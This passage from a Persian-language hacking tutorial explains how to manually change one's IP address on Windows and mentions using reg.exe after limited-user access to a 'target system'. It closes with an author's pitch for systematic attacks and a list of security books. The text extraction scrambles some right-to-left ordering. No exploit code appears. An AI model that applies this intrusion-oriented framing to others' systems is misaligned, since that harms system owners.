ﻧﻴﺴﺖ !ﻓﺮض ﮐﻨﻴﺪ ‪IP‬ﺷﻤﺎ ‪ 24.193.110.255‬ﺏﺎﺷﻪ ‪ .‬ﺷﻤﺎ ﻣﻴﺘﻮﻧﻴﻦ ﺏﻪ ﻃﻮر ﻣﺸﺨﺺ از ﻣﺤﺪودﻩ زیﺮ ﺏﺮاي ‪IP‬ﺟﺪیﺪ‬ ‫‪ -١‬ﺏﻪ دﺱﺖ اوردن ﻣﺤﺪودﻩ )‪ : ( IP‬ﺏﺪﺱﺖ اوردن ‪IP Range‬اﺻ ً‬ ‫ﺧﻮدﺕﻮن اﻧﺘﺨﺎب ﮐﻨﻴﻦ ‪:‬‬ ‫‪] < 24.193.110.255‬ﺁي ﭘﻲ ﺟﺪیﺪ[ < ‪24.193.110.1‬‬ ‫‪ -٢‬ﺏﻪ دﺱﺖ اوردن ‪ ،Subnet Mask‬ﻣﺪﺧﻞ‪ ،‬ﺱﺮور ‪ DHCP‬و ‪ : DNS‬ﺏﻪ دﺱﺖ اردون ایﻨﻬﺎ هﻢ ﺱﺎدﻩ اﺱﺖ! یﻪ ﺧﻂ ﻓﺮﻣﺎن ‪ DOS‬ﺏﺎز ﮐﻨﻴﻦ و ﺕﻮش ﺕﺎیﭗ ﮐﻨﻴﻦ‪:‬‬ ‫‪ ipconfig /all‬ﺷﻤﺎ ﺡﺎﻻ ﺏﺎیﺪ ﺏﺘﻮﻧﻴﻦ یﻪ ﭼﻴﺰي ﺷﺒﻴﻪ ﺏﻪ ایﻦ ﺏﺒﻴﻨﻴﺪ ‪:‬‬

‫‪Host Name . . . . . . . . . . . . : My Computer Name Here‬‬ ‫‪Primary Dns Suffix . . . . . . . :‬‬ ‫‪Node Type . . . . . . . . . . . . : Unknown‬‬ ‫‪IP Routing Enabled. . . . . . . . : No‬‬ ‫‪WINS Proxy Enabled. . . . . . . . : No‬‬ ‫‪Ethernet adapter Local Area Connection:‬‬ ‫‪Connection-specific DNS Suffix . : xxxx.xx.x‬‬ ‫)‪Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI‬‬ ‫‪Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX‬‬ ‫‪Dhcp Enabled. . . . . . . . . . . : Yes‬‬ ‫‪Autoconfiguration Enabled . . . . : Yes‬‬ ‫‪IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx‬‬ ‫‪Subnet Mask . . . . . . . . . . . : 255.255.240.0‬‬ ‫‪Default Gateway . . . . . . . . . : 24.xxx.xxx.x‬‬ ‫‪DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx‬‬ ‫‪DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx‬‬ ‫‪24.xx.xxx.xx‬‬ ‫‪24.xx.xxx.xxx‬‬ ‫‪Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM‬‬ ‫‪Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM‬‬ ‫ﺧﻮب ! ایﻦ ﺕﻤﻮم اﻃﻼﻋﺎﺕﻲ ﺏﻮد ﮐﻪ ﻧﻴﺎز داﺷﺘﻴﻦ ‪ .‬ﺏﻬﺘﺮﻩ اون ﺧﻂ ﻓﺮﻣﺎن ‪ DOS‬رو ﺏﺎز ﻧﮕﻪ داریﻦ یﺎ ایﻨﮑﻪ اﻃﻼﻋﺎت ﺁن را ﮐﭙﻲ ﮐﻨﻴﻦ ‪).‬ﺏﺮاي ﮐﭙﻲ ﮐﺮدن‪ ،‬ﻣﺘﻦ رو اﻧﺘﺨﺎب ﮐﻨﻴﻦ و یﮑﺒﺎر روش‬ ‫ﮐﻠﻴﮏ ﮐﻨﻴﻦ(‬ ‫‪ -٣‬ﻋﻮض ﮐﺮدن ‪ IP :‬ﺏﺮاي ﻋﻮض ﮐﺮدن ‪ IP‬ﺧﻮدﺕﻮن‪ ،‬اول ﺏﺎیﺪ یﮏ ‪IP‬اﻧﺘﺨﺎب ﮐﻨﻴﻦ ! ) یﺎدﺕﻮن ﻧﺮﻩ ﮐﻪ ﺕﻮ ﻣﺤﺪودﻩ ﺏﺎﺷﻪ( ﺏﻪ ﻧﻈﺮ ﻣﻦ ﺏﻬﺘﺮﻩ اول ﻣﻄﻤﺌﻦ ﺏﺸﻴﻦ ﮐﻪ ایﻦ ‪IP‬ﺟﺪیﺪ ﻣُﺮدﻩ( ! ایﻦ ‪IP‬‬ ‫را ) ﮐﻪ اﻧﺘﺨﺎب ﮐﺮدی ( ﭘﻴﻨﮓ ﮐﻨﻴﻦ و اﮔﻪ ‪ Time Out‬داد ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﻦ ﮐﻪ ﻣﻴﺸﻪ ازش اﺱﺘﻔﺎدﻩ ﮐﺮد ‪.‬ﺡﺎﻻ در ‪ Control Panel‬ﺏﺮیﺪ ﺏﻪ ‪ Network Connections‬و روي ‪Connection‬‬ ‫ﻓﻌﺎل داﺏﻞ ﮐﻠﻴﮏ ﮐﻨﻴﻦ ‪ .‬دﮐﻤﻪ ‪ Properties‬را ﺏﺰﻧﻴﻦ و ﺏﺮیﺪ ﺏﻪ ﺏﺮﮔﻪ ‪ Networking.‬ﺡﺎﻻ ) ‪ (Internet Protocol TCP/IP‬را اﻧﺘﺨﺎب ﮐﻨﻴﻦ و دﮐﻤﻪ ‪ Properties‬را ﺏﺰﻧﻴﺪ ‪.‬در ﭘﻨﺠﺮﻩ‬ ‫ﺟﺪیﺪي ﮐﻪ ﺏﺎز ﺷﺪﻩ‪ ،‬ﻗﺴﻤﺘﻬﺎي ‪ Use the following IP address‬و ‪ Use the following DNS server addresses‬را ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ اﻃﻼﻋﺎﺕﻲ ﮐﻪ در ﻗﺴﻤﺖ ‪ ٢‬ﺏﻪ دﺱﺖ اوردیﻦ ﭘﺮ ﮐﻨﻴﺪ ‪.‬‬ ‫در ﻗﺴﻤﺖ اول ‪ IP ،‬اي رو ﮐﻪ اﻧﺘﺨﺎب ﮐﺮدیﺪ ) ‪ IP‬ﺟﺪیﺪ ( و در ﻗﺴﻤﺖ دوم‪ ،‬ﺁدرس ‪ DNS Server‬را وارد ﮐﻨﻴﻦ ‪.‬ﺡﺎﻻ ﺕﻐﻴﻴﺮات رو ﺙﺒﺖ و ﺕﺄیﻴﺪ ﮐﻨﻴﻦ ‪.‬ﻓﻘﻂ یﻪ ﺕﺴﺖ ﮐﻮﭼﻴﮏ ﻣﻮﻧﺪﻩ ! در‬ ‫ﻣﺮورﮔﺮ ﺧﻮدﺕﻮن‪ ،‬ﺁدرس یﻪ ﺱﺎیﺖ را وارد ﮐﻨﻴﺪ ‪.‬اﮔﻪ ﺻﻔﺤﻪ ﺱﺎیﺖ اوﻣﺪ‪ ،‬ﺏﺪوﻧﻴﻦ ﮐﻪ ﺏﺎ ‪ IP‬ﺟﺪیﺪ داریﻦ ﮐﺎر ﻣﻴﮑﻨﻴﺪ ‪.‬ﺏﺮاي ایﻨﮑﻪ ﻣﻄﻤﺌﻦ ﺏﺸﻴﻦ ﮐﻪ ﺕﻐﻴﻴﺮات اﻋﻤﺎل ﺷﺪن‪ ،‬دوﺏﺎرﻩ در ﺧﻂ ﻓﺮﻣﺎن‬ ‫‪DOS‬ﺕﺎیﭗ ﮐﻨﻴﻦ ‪ ip config /all‬اﮔﻪ ﭘﺲ از اﺟﺮاي ایﻦ دﺱﺘﻮر‪IP ،‬و ‪DNS‬ﺟﺪیﺪ رو دیﺪیﺪ‪ ،‬ﺏﺪوﻧﻴﻦ ﮐﻪ درﺱﺖ ﻋﻤﻞ ﮐﺮدیﺪ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٧٠‬‬

‫ﺿﻤﻴﻤﻪ هﻔﺘﻢ و اﻟﺒﺘﻪ ﺁﺧﺮﻳﻦ ﺿﻤﻴﻤﻪ ؛ ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ ‪: REG.exe‬‬ ‫ﺧﻮب ﺷﺎیﺪ ﺧﻴﻠﯽ ﻣﻮاﻗﻊ ﺷﻤﺎ ﺏﻪ ﺱﻴﺴﺘﻢ هﺪف دﺱﺖ ﭘﻴﺪا ﮐﻨﻴﺪ ﺕﺤﺖ یﮏ ﮐﺎرﺏﺮ ﻣﺤﺪود و ﺷﻤﺎ داﻧﺶ اﺱﺘﻔﺎدﻩ از رﺟﻴﺴﺘﺮی را دارا هﺴﺘﻴﺪ وﻟﯽ اﺏﺰار‬ ‫ایﻦ ﮐﺎر را ﻧﺪاریﺪ در ﺏﻴﺸﺘﺮ ﻣﻮاﻗﻊ ویﺮایﺶ ﮔﺮ ﮔﺮاﻓﻴﮑﯽ رﺟﻴﺴﺘﺮی ﻧﻴﺰ در دﺱﺘﺮس ﻧﻴﺴﺖ و ﮐﺎر ﺁدم ﺧﻴﻠﯽ ﻣﺸﮑﻞ ﻣﻴﺸﻮد ﺡﺎل ﺷﻤﺎ اﮔﺮ اﻃﻼﻋﺎﺕﯽ‬ ‫در ﺏﺎرﻩ اﺏﺰار ‪ reg.exe‬داﺷﺘﻪ ﺏﺎﺷﻴﺪ ﺕﻤﺎم ﻣﺸﮑﻼت ﺷﻤﺎ ﺡﻞ ﻣﻴﺸﻮد ‪.‬‬ ‫ﮐﺎر ﺏﺎ ﺁن ﺱﺎدﻩ اﺱﺖ ﻗﺼﺪ ﺕﻮﺽﻴﺢ دادن ﺁن را ﻧﺪارم ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻮﺽﻴﺤﺎت ﮐﺎﻣﻞ ان را در‪ ١۴‬ﮐﺘﺎﺏﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﮐﺮدﻩ ام در ﭘﺎیﻴﻦ ‪ ،‬ﭘﻴﺪا ﮐﻨﻴﺪ‪.‬‬ ‫اﺧﺘﺘﺎﻣﻴﻪ ‪:‬‬ ‫ﺧﻮب دیﮕﺮ واﻗﻌًﺎ ﺧﺴﺘﻪ ﺷﺪﻩ ام از ﺏﺲ ﮐﻪ ﺕﺎیﭗ ﮐﺮدﻩ ام ﺷﺐ ﭘﻴﺶ داﺷﺘﻢ ﺱﺎیﺖ هﺎی اﻣﻨﻴﺖ را ﻣﯽ ﮔﺸﺘﻢ ﮐﻪ دیﺪم ﺱﺎیﺖ ﺁﺷﻴﺎﻧﻪ ﻣﺒﺎﻟﻎ هﻨﮕﻔﺘﯽ‬ ‫ﻣﻴﮕﻴﺮد و ﻣﻄﺎﻟﺒﯽ در هﻤﻴﻦ ﺱﻄﺢ و اﻟﺒﺘﻪ ﭘﺎیﻴﻦ ﺕﺮ!! را ﺁﻣﻮزش ﻣﯽ دهﺪ و اﻟﺒﺘﻪ ﻣﺘﺪهﺎی ﺏﺮای هﮏ ﻓﻘﻂ در ﺷﺮایﻂ ﺧﺎص و‪ ....‬ﻣﻦ ﮔﻔﺘﻢ ای ﺏﺎﺏﺎ‪...‬‬ ‫ﻣﻦ ﺱﻌﯽ ﮐﺮدم در ایﻦ ﻣﻘﺎﻟﻪ ﺁﻣﻮزش ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﺡﻤﻠﻪ را ﺏﻪ ﺷﻤﺎ دوﺱﺘﺎن ﺁﻣﻮزش ﺏﺪهﻢ‪ .‬در ایﻦ ﺷﻴﻮﻩ ‪ ،‬ﺷﻤﺎ ﻣﺜﻞ یﮏ اﻧﺴﺎن ﻋﻘﺪﻩ ای ﮐﻪ یﮏ )ﻓﻘﻂ‬ ‫یﮏ( ﻣﺘﺪ را ﺏﻠﺪ اﺱﺖ و ﻓﻘﻂ دﻧﺒﺎل ﻣﺎﺷﻴﻦ هﺎی ﺧﺎﺻﯽ ﻣﻴﮕﺮدد ﮐﻪ ﺏﻪ وﺱﻴﻠﻪ ﺁن ﻣﺘﺪ ﺁﺱﻴﺐ ﭘﺬیﺮ هﺴﺘﻨﺪ ؛ ﻧﻴﺴﺘﻴﺪ ﺏﻠﮑﻪ ﺷﻤﺎ ﺏﺎ اﻧﺘﺨﺎب یﮏ هﺪف‬ ‫ﺧﺎص و اﻟﺒﺘﻪ ﺏﺎیﺪ ﺏﺮای ﺷﻤﺎ هﻢ ﺻﺮف هﻢ داﺷﺘﻪ ﺏﺎﺷﺪ ﺷﺮوع ﺏﻪ ﺡﻤﻠﻪ ﺏﻪ ﺁن ﻣﻴﮑﻨﻴﺪ ﺕﺎ ﺏﻪ هﺪف ﺧﻮد ﺏﺮﺱﻴﺪ‪ .‬ﮐﺎر ﺏﺴﻴﺎر ﺁﺱﺎن اﺱﺖ ‪ ،‬و ﻧﻴﺎزی ﺏﻪ‬ ‫داﺷﺘﻦ اﻃﻼﻋﺎت ﺁﻧﭽﻨﺎﻧﯽ ﻧﻴﺰ در ‪ %٩٠‬ﻣﻮاﻗﻊ ﻧﺪارد ﻓﻘﻂ ﺏﺎیﺪ ﺡﻮﺻﻠﻪ داﺷﺘﻪ ﺏﺎﺷﺪ هﻤﻴﻦ ﺏﺲ ‪ ،‬ﺏﺎور ﮐﻨﻴﺪ ایﻦ ﻣﻄﻠﺐ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ اﻋﺘﻤﺎد ﺏﻪ‬ ‫ﻧﻔﺲ داﺷﺘﻪ ﺏﺎﺷﺪ و ﻣﻄﺎﻟﻌﻪ ﮐﻨﻴﺪ )ﻣﻦ واﻗﻌًﺎ ﺕﺎ ﺏﻪ ﺡﺎل هﺮ ﭼﻪ یﺎد ﮔﺮﻓﺖ ام از ﮐﺘﺎب ﺏﻮدﻩ در ﺏﻴﺶ از ‪ %٧٠‬از ﻣﻮاﻗﻊ( ‪ ،‬دیﮕﻪ هﻤﻴﻦ ﭼﻨﺪ ﺕﺎ ﮐﺘﺎب‬ ‫ﭘﺎیﻴﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﮔﺮ ﺡﻮﺻﻠﻪ داریﺪ ‪ E-BOOK‬ﺁن را ﭘﻴﺪا ﮐﻨﻴﺪ ﺏﺨﻮاﻧﻴﺪ ﺧﻴﻠﯽ ﺏﻪ ﺷﻤﺎ ﮐﻤﮏ ﻣﻴﮑﻨﺪ در ایﻦ راﻩ‪.‬‬ ‫‪ -١‬ﮐﺘﺎب ‪ Hacking Exposed‬ﮐﻪ ﻓﮑﺮ ﮐﻨﻢ از ﺱﺎیﺖ ﮐﺮوز ﺏﺘﻮاﻧﻴﺪ ﭘﻴﺪا ﮐﻨﻴﺪ ‪ ) .‬ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد (‬ ‫‪ -٢‬ﮐﺘﺎب ‪ Hacking Linux Exposed‬ﮐﻪ ﺁن هﻢ از ﺱﺎیﺖ ﮐﺮوز ﻗﺎﺏﻞ ﺏﺎرﮔﻴﺮی اﺱﺖ‪.‬‬ ‫‪ -٣‬ﮐﺘﺎب ‪ Security-Warrior‬ﮐﻪ ایﻦ ﺷﮑﻠﯽ‬

‫‪ -۴‬ﮐﺘﺎب ‪ Anti-Hacker toll kit‬ﮐﻪ ﺏﻴﺶ از ‪ %۴۵‬ﻣﻄﺎﻟﺐ ایﻦ ﻣﻘﺎﻟﻪ از ﺁن اﺱﺖ ‪ ) .‬ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد(‬ ‫‪ -۵‬ﮐﺘﺎب ‪ Computer Crime Incident Response: Investigating‬ﮐﻪ ﺧﻮب اﺱﺖ ‪ ) .‬ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد(‬ ‫‪ -۶‬ﮐﺘﺎب ‪ Hack Counter‬ﮐﻪ ﭼﻨﺪیﻦ ﺕﺮﺟﻤﻪ از ان ﻧﻴﺰ ﻣﻮﺟﺪ ﻣﻴﺒﺎﺷﺪ‪.‬‬ ‫‪ -٧‬ﮐﺘﺎب ‪ Kevin Mitnick Art Of Deception‬ﮐﻪ در ﺏﺎرﻩ هﻨﺮ ﻣﺦ زﻧﯽ ‪.‬‬ ‫‪ -٨‬ﮐﺘﺎب ‪ Security+‬ﮐﻪ از ﻣﺎیﮑﺮوﺱﺎﻓﺖ ‪.‬‬ ‫‪ -٩‬ﮐﺘﺎب ‪ ). Google Hack‬در ﺻﻮرت ﺏﻴﮑﺎری ﺏﺪ ﻧﻴﺴﺖ!!(‬ ‫‪ -١٠‬ﮐﺘﺎب ‪ Hack Proofing Your Network‬ﮐﻪ ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ یﺎ ﺷﺎیﺪ یﮏ درﺟﻪ ﺏﺎﻻﺕﺮ !!‬ ‫‪ -١١‬ﮐﺘﺎب ‪ Microsoft Windows XP registry guide‬هﻢ ﺏﺪ ﻧﻴﺴﺖ‪.‬‬ ‫‪ -١٢‬و ‪....‬‬ ‫** داﺷﺘﻦ ﮐﺘﺎب ﻓﺮهﻨﮓ ﻟﻐﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺏﺎ ﻋﻨﻮان ‪ Microsoft Computer Dictionary‬هﻢ در ﻣﻄﺎﻟﻌﻪ از ﺽﺮوریﺎت اﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ‪:‬‬

‫***‬ ‫ﺏﻪ ﭘﺎیﺎن ﻣﻘﺎﻟﻪ رﺱﻴﺪیﻢ اﻣﻴﺪوار هﺴﺘﻢ ایﻦ ﻣﻘﺎﻟﻪ ﻣﻔﻴﺪ واﻗﻊ ﺏﺎﺷﺪ ﺏﺮای ﺷﻤﺎ دﺱﺘﺎن ؛ ﺏﻪ اﻣﻴﺪ ﻣﻮﻓﻘﻴﺖ ﺏﺮای هﻤﻪ ‪ ،‬اﻟﺒﺘﻪ در هﺮ ﮐﺎری ﮐﻪ هﺴﺘﻨﺪ و ﻧﻴﺰ‬ ‫در هﺮ ﻣﻘﻄﻌﯽ ﮐﻪ هﺴﺘﻨﺪ ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬ ‫دوﺱﺘﺎر ﺕﻤﺎﻣﯽ دوﺱﺘﺎن ‪. Zxo003‬‬ ‫یﺎ ﺏﺎ ﻧﺎم ﻣﺴﺘﻌﺎر " ﺁﻗﺎی ﻣﻦ "‪.‬‬ ‫ﺏﺎ ﺕﺸﮑﺮ از هﻢ ﮐﺎری ﺧﻮدم " ﺧﻮژت هﮑﺮ "‪.‬‬

‫ﺻﻔﺤﻪ‬

‫‪٧١‬‬

Related Documents

Hacking
November 2019 35
Hacking
November 2019 34
Hacking
April 2020 26
Hacking
May 2020 24
Hacking
October 2019 40
Hacking
June 2020 22